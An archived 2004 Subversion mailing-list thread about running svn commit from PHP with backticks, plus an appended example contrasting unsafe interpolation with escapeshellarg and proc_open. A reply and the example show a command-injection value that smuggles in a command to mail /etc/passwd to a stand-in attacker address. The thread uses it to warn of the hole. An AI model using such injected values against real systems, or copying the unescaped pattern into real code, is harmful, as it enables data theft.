
Re: PHP hack under way

From: Rick Gigger <rick_at_alpinenetworking.com>
Date: 2004-02-11 23:56:04 CET

Isn't this a project to create real php bindings?

http://spe.tigris.org/

Bryan Simmons wrote:

> But $message is created by the script, with no user input. It comes
> from portal variables such as the current user and location in the
> portal. Also, the apache2 server is running as the svn user who can
> only access things in ~/ and /usr/local/apache2/htdocs.
>
> Regards,
>
> Bryan Simmons
>
>
> -----Original Message-----
> From: Brian W. Fitzpatrick [mailto:fitz@red-bean.com]
> Sent: Wednesday, February 11, 2004 4:56 PM
> To: Simmons, Bryan
> Cc: users@subversion.tigris.org
> Subject: Re: PHP hack under way
>
>
> On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
>
>>Ok, so I went ahead and took the easiest approach I could: svn client
>>commands in php. The kinks have not all been worked out for my php
>>portal but I did find a way to successfully
>>push revisions to subversion through php.
>>
>>I use the backtick operator. Yep, it's that simple.
>>
>>$response = `svn commit -m \"$message\"`;
>>
>>I have found that the $response is dead-on accurate in this case
>>despite warnings that the command line response may be garbled into
>>binary.
>>
>>Here's a question: will svn add && svn commit work?
>
> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this. What if message is
> actually equal to
>
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
>
> or something worse.
>
> Just a little something to think about.
>
> -Fitz
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
> For additional commands, e-mail: users-help@subversion.tigris.org
>

Received on Wed Feb 11 23:56:52 2004
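
The concern raised in the quoted reply, as an added example that is not code from the thread or from any participant: the interpolated command line next to two ways of passing the log message as data. The function names, the `--non-interactive` flag and the working-copy parameter are assumptions of this example; the array form of `proc_open()` and the `redirect` descriptor need PHP 7.4 or later.

```php
<?php
// Added example; not code posted in the thread.

// Constructed input: the value from the quoted reply, written as the
// PHP string it denotes.
$message = 'foo" ; mail evilhaxor@example.com < /etc/passwd';

// Pattern under discussion: the message is interpolated into a shell
// command line, so a double quote inside it ends the -m argument and
// the remainder is parsed by the shell.
function naive_command(string $message): string
{
    return "svn commit -m \"$message\"";
}

// Same command line, with the message quoted as one shell word
// (single-quoted on POSIX systems).
function escaped_command(string $message): string
{
    return 'svn commit -m ' . escapeshellarg($message);
}

// No shell involved: given an array, proc_open() hands each element to
// the program as one argv entry, so metacharacters stay literal text.
function svn_commit(string $message, string $workingCopy): array
{
    $argv = ['svn', 'commit', '--non-interactive', '-m', $message];
    // stdout is captured; stderr is merged into it to avoid a pipe deadlock.
    $spec = [1 => ['pipe', 'w'], 2 => ['redirect', 1]];
    $proc = proc_open($argv, $spec, $pipes, $workingCopy);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start svn');
    }
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    return ['exit' => proc_close($proc), 'output' => $output];
}

// Print both command lines for comparison; nothing is executed here.
echo naive_command($message), "\n";
echo escaped_command($message), "\n";
```

`svn_commit()` is only defined, not called, because it needs an `svn` binary and a working copy; values such as a portal user name or location are still data and belong in the same argv slot.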

This is an archived mail posted to the Subversion Users mailing list.
